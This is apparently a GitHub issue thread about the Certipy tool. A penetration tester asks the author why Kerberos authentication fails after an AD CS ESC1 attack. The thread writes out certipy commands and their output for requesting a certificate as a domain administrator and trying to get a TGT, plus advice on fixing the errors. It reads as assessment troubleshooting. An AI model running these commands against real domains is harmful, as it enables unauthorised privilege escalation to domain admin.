KDC_ERR_C_PRINCIPAL (Client not found in Kerberos database)

[ActivateDZA]

Hi

Can someone please assist me with this error as shown in the image below I can use ESC1 to get a pfx file for an admin account

However when I try to get the TGT I get the following error message. I have been googling and researching all day but can't get a solid answer.

I can confirm that the account I am requesting for exists.

[ly4k]

It’s usually an indication that the username provided during Kerberos authentication wasn’t found. It’s a bit difficult for me to see the format of the username/UPN. In the certificate, is the UPN in the user@domain.local format or how did you create it? Alternatively, during the authentication command, you can specify the username manually. Certipy tries to deduct the username and domain based on the certificate.

If you want more help, can you please send me the output and simply redact domain and username with a generic one so I can see if the information passed around is correct

[ActivateDZA]

Here is the commands I used

certipy req -u 'lowpriv' -p 'password' -ca CA01-CA -target CA01-CA.company-za.com -template WebServer -upn DomainAdmin@company-za.com -dns DC01.company-za.com

Auth commands certipy auth -pfx DomainAdmin_DC01.pfx -dc-ip 10.0.0.5

The UPN is in the user@localdomain.local but I suspect that they might be using their outside domain i.e company.com while in the AD is using company-za.com

[ly4k]

I did some more testing. And I realized what your issue is. When you are requesting the certificate, you are specifying both a UPN and DNS name. It is not necessary to specify both. As for regular user accounts, these do not have a DNS host name, so when you are using the DNS option while authenticating, it tries to lookup the user based on the DNS name. Instead, try using only the UPN but selecting option 0 while authenticating when prompted.

[ly4k]

Have a look at my reproduction of your issue.

[ly4k]

As you can see, when trying the DNS, it attempts to authenticate as administrator$ instead of administrator.

[ActivateDZA]

HI Ly4k

Thank you for the speedy reply I am onsite doing the assessment and I have tested it with no DNS

certipy req -u 'REDACTED' -p 'REDACTED' -ca CA01 -target CA01.company-za.com -template WebServer -upn domainadmin@company-za.com Certipy v4.8.1 - by Oliver Lyak (ly4k)

[] Requesting certificate via RPC [] Successfully requested certificate [] Request ID is 195 [] Got certificate with UPN 'domainadmin@company-za.com' [] Certificate has no object SID [] Saved certificate and private key to 'domainadmin.pfx'

Getting the request works no worries

However when I try to auth

certipy auth -pfx domainadmin.pfx -dc-ip DC_IP_ADDRESS
Certipy v4.8.1 - by Oliver Lyak (ly4k)

[] Using principal: domainadmin@company-za.com [] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_INCONSISTENT_KEY_PURPOSE(Certificate cannot be used for PKINIT client authentication)

[ly4k]

This means that the template does not allow client authentication. Likely, it specifies only server authentication given the name of the template. This means it's not vulnerable to ESC1.

[ActivateDZA]

It was vulnerable to ESC4 and I did the attack to make it vulnerable to ESC1 but I will check tomorrow morning and follow up.

[ly4k]

Okay, I've heard about this issue before here https://github.com/ly4k/Certipy/issues/92. I don't know when this error happens in those cases. There might be a delay before it will work.